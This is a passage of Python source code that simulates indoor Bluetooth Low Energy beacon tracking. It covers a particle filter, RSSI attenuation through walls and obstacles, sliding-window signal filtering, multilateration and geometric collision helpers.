ylength *= 72
# Scale linewidth to value range
xresult=linewidth * (xlength / xvalue_range)
yresult=linewidth * (ylength / yvalue_range)
#print "xresult: " + str(xresult)
#print "yresult: " + str(yresult)
return max(xresult,yresult)
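# A small usage sketch (never called) showing how linewidth_from_data_units above is meant to
# be used: room walls are specified in map meters (roomWallWidth) while matplotlib linewidths
# are in points, so the conversion depends on the current axis limits and figure size.
# Everything referenced here already exists in this module; the figure is illustrative only.
def _sketch_wall_linewidth_in_points():
    fig, ax = plt.subplots()
    ax.set_xlim(xdims)
    ax.set_ylim(ydims)
    wall_points = linewidth_from_data_units(roomWallWidth, ax)  # meters -> points
    ax.plot([1, 4], [1.5, 1.5], linewidth=wall_points, color='gray')  # a wall-thick line
    return wall_points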
class OOI:
def __init__(self,xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson):
# INITIALIZATION STEP, distribute particles on the map
self.particles = create_uniform_particles(xdims,ydims , NumberOfParticles)
self.weights = np.ones(NumberOfParticles) / NumberOfParticles
#beacon_pos = np.array([0.0, 0.0])
#self.beacon_pos = np.array( [(xdims[1]-xdims[0])/4.0,(ydims[1]-ydims[0])/4.0] )
self.beacon_pos=initialPositionOfThePerson
self.prev_walkingNoise=None
self.x_prev = np.zeros((NumberOfParticles, 2)) # prev particles
self.x_pp = np.zeros((NumberOfParticles, 2)) # prev of prev particle
self.receiverPositions = receiverPositions
self.RSSIofReceivers=[] # the RSSI values for this person as seen by our receiver devices
self.UnprocessedRSSIofReceivers=[] # BLE fingerprinting needs the raw value to compare its results against the received one (still weakened, since real-world attenuation has to be simulated)
self.distToReceivers=[]
self.prevCovMatrix=None
self.mu=None
self.max_weighted_particle=None
self.slidingWindows=[col_deque([]) for i in range(len(receiverPositions) ) ]
# actually I should do circle-rectangle collision detection:
# http://jeffreythompson.org/collision-detection/circle-rect.php
# ensure the person does not go out of the map
# movingLimit is the max step length of the person, say 1 meter per time step for example
# movingTendency is the tendency of the person to move in a particular direction
def move_beacon_in_map(self,xdims, ydims,movingLimit,movingTendency=np.array([0,0]),roomBoundary=0 ):
# loop over all the blocks; only move if the new position intersects none of them
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
xlow = np.maximum(xmin,self.beacon_pos[0]-movingLimit)-self.beacon_pos[0]
xhigh =np.minimum(xmax, self.beacon_pos[0]+movingLimit)-self.beacon_pos[0]
ylow = np.maximum(ymin,self.beacon_pos[1]-movingLimit)-self.beacon_pos[1]
yhigh =np.minimum(ymax, self.beacon_pos[1]+movingLimit)-self.beacon_pos[1]
while True:
walking_noise_x = np.random.uniform(low=xlow,high=xhigh) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh)
#walking_noise = np.zeros(particles.shape)
walkingNoise=np.array( (walking_noise_x,walking_noise_y)).T
#walkingNoise=np.random.uniform(-movingLimit,movingLimit,size=(2,))
if self.prev_walkingNoise is not None:
walkingChoices=[walkingNoise,self.prev_walkingNoise]
walkingNoise = np.copy(walkingChoices[ np.random.choice([0,1], p=(1-prevMotionRepeatProb,prevMotionRepeatProb)) ] ) # choose the prev motion with a higher probability
tmpBeaconPos=self.beacon_pos + walkingNoise + movingTendency
#print "beacon pos is: " + str(self.beacon_pos)
#print "walkingNoise is: " + str(walkingNoise)
isCollision=not checkIfCoordinateIsInMap(tmpBeaconPos, OOIWidth,OOIHeight)
if not isCollision:
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength) or \
findRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,blockPosition,blockWidth,blockLength) is not None :
isCollision=True
break
if not isCollision:
for roomPosition in roomPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth,roomLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomBoundary) or \
findRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,roomPosition,roomWidth,roomLength) is not None :
isCollision=True
break
if not isCollision:
break
self.prev_walkingNoise=np.copy(walkingNoise)
self.beacon_pos = np.copy(tmpBeaconPos)
# use the constant velocity model described on page 32
# for walking, mu would be about 0.5 meter and the std about 0.2 m,
# so we can take the variance as roughly 0.04 m^2
# p(x_t | x_{t-1}) can be computed as follows: evaluate the Gaussian for p(x_t), then for p(x_{t-1}); note that p(x_t, x_{t-1}) = p(x_t | x_{t-1}) * p(x_{t-1})
# i.e. it is the probability of both occurring at the same time,
# the area under the two probabilities; dividing that area by p(x_{t-1}) gives the result -> which corresponds to the formula on page 32 (dividing amounts to subtracting the exponents)
# for the velocity, x(t-1) and x(t-2) must be given; they default to None, and if even one of them is None the velocity cannot be computed, so in the first steps
# we predict without taking them into account, i.e. it reduces to Brownian motion.
# I could not quite work out what d on page 32 is; I will simply take it to be 1.
# x_prev = x(t-1)
# x_pp = prev of x_prev
def predict_BLE( self, no_of_noise_elements, movingLimit, pastCoeff, xdims, ydims, movingTendency=np.array([0,0]) ):
#rand_gaussian_noise=np.random.multivariate_normal(mu=mu,cov=sigma,size=no_of_noise_elements) # Draw random samples from a multivariate normal distribution
#rand_gaussian_noise = 0
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
# ALL PARTICLES SHOULD RESIDE IN THE MAP, CHECK FOR BEING INSIDE FOR EACH PARTICLE (MOVE THAT AMOUNT AT THE BORDERS AT MAX)
# min of x, should not be lower than map's xmin && max of x should not be larger than map's xmax
# meaning low should be max(xmin,particles[:,0]-xmin-movingLimit) && high = min(xmax, xmax-particles[:,0]+movingLimit)
xlow = np.maximum(xmin,self.particles[:,0]-movingLimit)-self.particles[:,0]
xhigh =np.minimum(xmax, self.particles[:,0]+movingLimit)-self.particles[:,0]
ylow = np.maximum(ymin,self.particles[:,1]-movingLimit)-self.particles[:,1]
yhigh =np.minimum(ymax, self.particles[:,1]+movingLimit)-self.particles[:,1]
walking_noise_x = np.random.uniform(low=xlow,high=xhigh,size=self.particles.shape[0]) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh,size=self.particles.shape[0])
##print "walking_noise_x is: " + str(walking_noise_x)
#walking_noise = np.zeros(particles.shape)
walking_noise_x=np.array(walking_noise_x)
walking_noise_y=np.array(walking_noise_y)
walking_noise=np.array( (walking_noise_x,walking_noise_y)).T
if np.count_nonzero(self.x_prev) != 0 and np.count_nonzero(self.x_pp) != 0:
past_velocity = self.x_prev - self.x_pp
change_in_pos = (1-pastCoeff) * walking_noise + pastCoeff * past_velocity # constant_velocity_motion
else:
change_in_pos = walking_noise
#particles +=
self.particles += change_in_pos + movingTendency
# Update the weight of the particles according to the measured beacon position found in the multilateration algorithm for the current time step
def update_weights(self):
distances = np.linalg.norm(self.particles - self.averaged_beacon_pos, axis=1)
self.weights *= np.sum(distances)/distances
# SET ALL WEIGHTS INTERSECTING WITH AN OBSTRUCTION TO ZERO (so that particles do not accumulate on obstructions)
for particleIndex, particle in enumerate(self.particles):
isCollision=False
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex,roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth[roomIndex],roomLength[roomIndex]):
#print "room wall width is: " + str(roomWallWidth)
# use roomWallWidth/2, since linewidth expands toward outside and inside (for roomWallWidth, expands roomWallWidth/2 towards inside and roomWallWidth/2 towards outside)
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomWallWidth/2):
isCollision=True
break
if isCollision:
self.weights[particleIndex]=0
self.weights += 10**(-300) # avoid round-off to zero
self.weights /= sum(self.weights) # normalize
# Resample N_eff
def resample_from_higher_weights(self,tmp_particles, tmp_weights):
#indices = multinomial_resample(weights)
#indices = residual_resample(weights)
#indices = stratified_resample(weights)
indices = systematic_resample(self.weights)
tmp_particles[:] = tmp_particles[indices]
tmp_weights[:] = tmp_weights[indices]
tmp_weights.fill(1.0 / len(tmp_weights))
# maxSignalError in dBm
# it should call checkLineSegmentCollision_WithRectange to lower the signal if the receiver and the beacon are not in "Line of Sight"
def calc_RSSIs_to_Receivers(self,minSignalValue,minValidSignal,maxSignalError):
self.RSSIofReceivers[:] = []
self.UnprocessedRSSIofReceivers[:] = []
receiverIndex=0
for receiverPosition in self.receiverPositions:
res_unprocessedRSSI = 0
if(maxSignalError > 0):
res_unprocessedRSSI=weakenedSignal( distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos) ) , maxSignalError )
else:
##print "the norm is: " + str(np.linalg.norm(receiverPosition-self.beacon_pos ))
res_unprocessedRSSI=distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos ) )
#return max(-100,unprocessedRSSI) # Generally signals lower than -100 are not that reliable
isCollision=False
# this is used to weaken the signal in case there was a block or room between the receiver and the beacon(this is real calculation)
# this simulates the signal before we catch it in real life.
weakeningAmount=0 # distance between the receiver and the beacon / 1 meter * ( how many dBm to reduce for 1 meter)
for blockIndex, blockPosition in enumerate(blockPositions):
receiverBeaconBlockIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,blockPosition,blockWidth,blockLength)
if receiverBeaconBlockIntersection is not None:
#print "receiverBeaconBlockIntersection" + str(receiverBeaconBlockIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconBlockIntersection[0,:]-receiverBeaconBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ] * np.random.uniform(0.5,1.5) # add +/- some noise
# adding noise per obstacle is appropriate for real life as well
# actually I should also take the wall's material into account here; the coefficients were per 1 m after all
# it should be distance/1 * coefficient, i.e. distance (in meters) * coefficient
for roomIndex, roomPosition in enumerate(roomPositions):
receiverBeaconRoomIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,roomPosition,roomWidth,roomLength)
if receiverBeaconRoomIntersection is not None:
#print "receiverBeaconRoomIntersection" + str(receiverBeaconRoomIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconRoomIntersection[0,:]-receiverBeaconRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ] * np.random.uniform(0.5,1.5)
# * some coefficient (so the signal is not weakened too much inside a room); weakening by as much as the room's walls is enough, which is roughly 1/8 of the room (counting the 2 walls that we cross)
strengtheningAmount=0 # (distance between the receiver and the mean of the particles) / 1 meter * ( how many dBm to reduce for 1 meter)
# the calculations below are not real. They are our prediction by looking at the mean value of the particles
# if the mean of the prev calculations and the beacons have a block or room in between, we better increase the signal
# this simulates after receiving the signal in real life (post processing of the signal)
isMeanReceiverCollision=False # this is used to strengthen the received signal in case there was a block in between previously
if self.mu is not None: # do not use != here, because it raises an error when this is an array
for blockIndex, blockPosition in enumerate(blockPositions):
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,roomPosition,roomWidth,roomLength)
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
if isCollision:
##print "No Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
#res_unprocessedRSSI=( weakenedSignal(res_unprocessedRSSI,maxSignalError) + res_unprocessedRSSI ) / 2.0 #weaken a bit, but not weaken upto max signal error
res_unprocessedRSSI-=weakeningAmount
else:
pass
##print "Direct Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
res_processedRSSI=res_unprocessedRSSI
if isMeanReceiverCollision:
res_processedRSSI+=strengtheningAmount
##print "increased signal strength since there was a wall between the receiver and the beacon in the previous step according to our particle calculations"
# ONE MORE CHECK FOR SLIDING WINDOWS #
# each receiver should have a sliding window
# max slidingWindows size should be 7
slidingWindow = self.slidingWindows[receiverIndex]
while len(slidingWindow) >=7:
##print "prev size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.popleft() # delete oldest element
##print "after size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.append(res_processedRSSI) # appends at the right
##print "final size of the window is: " + str( len(self.slidingWindows) )
if self.filterAndCheckSignal(minValidSignal,receiverIndex) and res_processedRSSI > minSignalValue:
##print "filtering was successful"
self.RSSIofReceivers.append( res_processedRSSI )
self.UnprocessedRSSIofReceivers.append( res_unprocessedRSSI )
else:
##print "filtering was not successful"
self.RSSIofReceivers.append( None )
self.UnprocessedRSSIofReceivers.append( None )
receiverIndex+=1
def filterAndCheckSignal(self,minValidSignal,receiverIndex):
mean=0.0
sum=0.0
slidingWindow = self.slidingWindows[receiverIndex]
if len(slidingWindow) < 3:
return False
else:
noOutlierDeque=col_deque(sorted(slidingWindow) )
noOutlierDeque.popleft() # delete smallest
noOutlierDeque.pop() # delete greatest
for signalVal in noOutlierDeque:
sum+=signalVal
mean=sum/len(noOutlierDeque)
return mean >= minValidSignal
# if RSSI is lower than -90dBm , then omit this receiver ( assuming we use 0dBm signal powered beacons)
def setBeaconDistances_fromRSSIs(self,minValidSignal):
self.distToReceivers[:] = []
for RSSIofReceiver in self.RSSIofReceivers:
#print "rssi of receiver is: " + str(RSSIofReceiver)
if RSSIofReceiver is not None and \
RSSIofReceiver > minValidSignal:
self.distToReceivers.append( RSSI_to_distance( RSSIofReceiver ) + safetyOffset ) # add safetyOffset to avoid divide by zero in the custom_minimize function
else:
self.distToReceivers.append( None )
# NumberOfParticles for 4 RECEIVER
def multiLateration(self,xdims,ydims,sensitivityOfResult):
distToReceiversArray = np.array(self.distToReceivers)
receiverPositionsArray=np.array(self.receiverPositions)
##print "elements are : " + str( elements )
#resultingPoint = Trilaterate(rp1.coord,elements[0],rp2.coord,elements[1],rp3.coord,elements[2])
#resultingPoint = minimize_dist_error(elements,np.vstack(coordinates ),xdims,ydims )
#with open('deneme.txt', 'a') as the_file:
# the_file.write("beacon_pos is: " + str(self.beacon_pos) + "\n" )
#print "beacon_pos is: " + str(self.beacon_pos)
# if checkForBlocks == True, it also considers blocks for minimization in the disadvantage of time consumption
# checkForBlocks means the None (no-signal) information is also used in the multilateration calculation
resultingPoint = custom_minimize(self.UnprocessedRSSIofReceivers,distToReceiversArray,np.vstack(receiverPositionsArray ),xdims,ydims,sensitivityOfResult,checkForBlocks=True )
return resultingPoint
def calc_PDF(self,strongSignalDistance,pastCoeff):
numberOfNotNones=0
numberOfStrongSignals=0
confidenceEllipseMultiplier=1
for distToReceiver in self.distToReceivers:
if distToReceiver is not None:
numberOfNotNones+=1
#print "dist to receiver is: " + str(distToReceiver)
if distToReceiver < strongSignalDistance:
numberOfStrongSignals+=1
"""returns mu and variance of the weighted particles"""
self.mu = np.average(self.particles, weights=self.weights, axis=0)
#var = np.average((particles - mu)**2, weights=weights, axis=0)
self.covMatrix = np.cov(m=self.particles, rowvar=False, aweights=self.weights) # rowvar has to be False otherwise each row represents a variable, with observations in the columns.
# https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.cov.html
self.max_weighted_particle = self.particles[np.argmax(self.weights) ]
if numberOfNotNones >=3:
if numberOfStrongSignals >= 3:
confidenceEllipseMultiplier=1 # No change
elif numberOfStrongSignals == 2:
confidenceEllipseMultiplier=1.25
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=1.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=2
# x1.6 worse than the >=3 case
elif numberOfNotNones == 2:
if numberOfStrongSignals == 2:
confidenceEllipseMultiplier=2
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=2.4
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=3.2
# x3 worse than the >=3 case
elif numberOfNotNones == 1:
if numberOfStrongSignals == 1:
confidenceEllipseMultiplier=4.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=6.0
# x5 worse than the >=3 case
else: # numberOfNotNones == 0:
#confidenceEllipseMultiplier=float("inf") # with this it would not draw the ellipse at all
confidenceEllipseMultiplier=10.0 # let 10.0 be our maximum, for example
self.covMatrix*=confidenceEllipseMultiplier
# if pastCoeff == 1, then except for the first iteration covMatrix would always equal the previous one, i.e. the covariance found in the first iteration would remain the estimate for good
if self.prevCovMatrix is not None:
self.covMatrix=self.covMatrix*(1-pastCoeff) + pastCoeff*self.prevCovMatrix
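# A standalone sketch (never called) of the constant-velocity blend used in OOI.predict_BLE
# above (see the "page 32" comments): the per-step displacement mixes fresh uniform walking
# noise with the velocity implied by the two previous particle sets, weighted by pastCoeff.
# The array values below are made up purely for illustration.
def _sketch_constant_velocity_blend(past_coeff=0.2, n_particles=5):
    walking_noise = np.random.uniform(-movingLimit, movingLimit, size=(n_particles, 2))
    x_pp = np.random.uniform(0, 1, size=(n_particles, 2))                   # particles at t-2
    x_prev = x_pp + np.random.uniform(-0.5, 0.5, size=(n_particles, 2))     # particles at t-1
    past_velocity = x_prev - x_pp                    # one-step displacement, with d taken as 1
    change_in_pos = (1 - past_coeff) * walking_noise + past_coeff * past_velocity
    return x_prev + change_in_pos                    # predicted particles at time t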
# circle center, circle radius, 2 ends of line segment
def findEllipseLineSegmentIntersectionPoints(ellipseCenter,width,height, p1,p2):
if ( np.array_equal(p1,p2) ):
return None
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
line = LineString([p1,p2])
if ellipse.intersects(line):
intersectionPointObject = ellipse.intersection(line)
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
#print "ellipse line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
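# A minimal sketch of the per-receiver sliding-window filter implemented in
# OOI.filterAndCheckSignal above: keep at most 7 recent RSSI readings, drop the smallest and
# largest as outliers, and accept the reading only if the trimmed mean is at least
# minValidSignal. Standalone and never called; `window` is any iterable of dBm values.
def _sketch_trimmed_mean_filter(window, min_valid_signal=minValidSignal):
    window = col_deque(window, maxlen=7)     # same cap as the per-receiver windows above
    if len(window) < 3:
        return False                          # not enough samples to judge yet
    trimmed = sorted(window)[1:-1]            # drop the smallest and the largest reading
    return sum(trimmed) / len(trimmed) >= min_valid_signal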
def checkFirstRectangleContainsSecondRectangle(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.contains(rectangle2)
def checkRectangleRectangleIntersection(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.intersects(rectangle2)
# circle center, circle radius, 2 ends of line segment
def checkEllipseRectangleIntersection(ellipseCenter,width,height, rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
#print "bottomLeftCorner is: " + str(bottomLeftCorner)
#print "topRightCorner is: " + str(topRightCorner)
#print "room position is " + str(rectCenter)
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return ellipse.intersects(rectangle)
def checkPointInsideRectangle(point,rectCenter,rectWidth,rectLength,boundaryForRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
point = Point(point)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return point.intersects(rectangle)
# if the line intersects the rectangle at only 1 point (which could be the rectangle's corner), we can return None since there is effectively no intersection
# it may intersect at infinitely many points when the segment lies on the same line as an edge
# apart from that, when checking x,y this lowers the chance of points inside a room, because points inside a room always intersect no matter how thick the wall is
# actually this does not handle entering the room (my green beacon cannot enter a room anyway, but if it could, the intersection check should not apply inside the room)
# actually if the line segment endpoint, i.e. x,y, is inside a room, that x,y should not be accepted at all (by the simulation it cannot be there, but for now I assume rooms are never entered)
# for now, points inside a room are at least slightly penalized; leave it like this, since we cannot get very close anyway these points have a low chance
# preventing the infinite-intersection and single-point-intersection cases is enough for now
# actually 'contains' also means intersecting at infinitely many points, so for an infinite intersection it returns the first and last intersection points of the line
# or maybe it treats the inside of the rectangle as empty and we never penalize points inside the room, I am not sure
def findRectangleLineSegmentIntersectionPoints(p1,p2,rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
if np.array_equal(p1,p2):
return None
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
line = LineString([p1,p2])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
#print "findRectangleLineSegmentIntersectionPoints"
if rectangle.intersects(line):
intersectionPointObject = rectangle.intersection(line)
#print intersectionPointObject.coords[0]
#print intersectionPointObject.coords[1]
#print np.array(intersectionPointObject.coords).shape
if np.array_equal(np.array(intersectionPointObject.coords).shape,np.array([2, 2])):
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
else:
intersectionPoint=None
#print "rectangle line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
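# A small sketch (illustrative values, never called) of how the intersection points returned
# above are turned into a signal attenuation in OOI.calc_RSSIs_to_Receivers: the length of the
# segment crossing an obstacle, times the per-meter coefficient of its material, gives the dBm
# loss. The receiver/beacon/block coordinates below are made up for the example.
def _sketch_obstacle_attenuation_dbm():
    receiver = np.array([0.0, 1.5])
    beacon = np.array([4.0, 1.5])
    block_center, material = np.array([2.0, 1.5]), 'concrete'
    crossing = findRectangleLineSegmentIntersectionPoints(receiver, beacon, block_center,
                                                          blockWidth, blockLength)
    if crossing is None:
        return 0.0                                   # line of sight, no extra loss
    crossing_len = np.linalg.norm(crossing[0, :] - crossing[1, :])
    return crossing_len * material_SignalDisturbance_Coefficients[material]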
def generateRandomMACID():
return ':'.join('%02x'%np.random.randint(0,256) for _ in range(6))
# if the signal arriving at a receiver is strong despite the attenuation, it is more valuable to us than the other, weaker signals
# therefore a signal with a small distToReceivers value tells us more
# since we prefer this value to be small, dividing by it makes the sum smaller for such receivers and increases the chance of finding the point we want
# if the [x,y] point we check for multilateration differs from the BLE fingerprinting result by more than +-2 dBm, penalize it, since such points are less likely
def custom_minimize(UnprocessedRSSIofReceivers,distToReceivers, receiverPositions,xdims,ydims,sensitivityOfResult=1.0,checkForBlocks=True):
mysum=float("inf")
maxCatchableSignalDistance = RSSI_to_distance( minValidSignal ) + safetyOffset
#print "maxCatchableSignalDistance is: " + str(maxCatchableSignalDistance)
resultingPoint=[-1,-1]
for x in np.arange(xdims[0],xdims[1],sensitivityOfResult):
for y in np.arange(ydims[0],ydims[1],sensitivityOfResult):
# if x,y collides with a block or room, this position would not be possible
isPointOnObstacle=False
for blockPosition in blockPositions: # it will not enter this loop if there are no blocks
if checkPointInsideRectangle([x,y],blockPosition,blockWidth,blockLength):
isPointOnObstacle=True
break
if not isPointOnObstacle:
for roomPosition in roomPositions:
if checkPointInsideRectangle([x,y],roomPosition,roomWidth,roomLength):
isPointOnObstacle=True
break
if isPointOnObstacle:
continue # this point cannot be what we are looking for
tmp_sum=0
for i in range(len(receiverPositions)):
#with open('deneme.txt', 'a') as the_file:
# the_file.write("receiverPositions is : " + str(receiverPositions[i]) + "\n" )
# the_file.write("distToReceivers is : " + str(distToReceivers[i]) + "\n")
if distToReceivers[i] is not None:
tmp_sum+=( abs( np.linalg.norm( [x,y] - receiverPositions[i] ) - distToReceivers[i] ) /distToReceivers[i] ) ** 2
#if abs( UnprocessedRSSIofReceivers[i] - interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y] ) > 5: # if the difference is more than 5 dBm:
#tmp_sum+=( abs( UnprocessedRSSIofReceivers[i] - interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y] ) / 5 ) ** 2
else: # if distToReceivers[i] is None, it should be impossible for [x,y] to be closer to this receiver than a certain distance (penalize it if it is closer)
# the closer [x,y] is to receiverPositions[i], the more we penalize it
# distToReceivers[i] is only our own estimate anyway; we could instead use, say, 10 m and measure how far it deviates from that
# but for us the closer the worse, since we expect at least a certain distance, so use 1/([x,y]-receiverPositions) instead of 1/distToReceivers
if checkForBlocks:
strengtheningAmount=0
for blockIndex, blockPosition in enumerate(blockPositions): # it will not enter this loop if there are no blocks
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
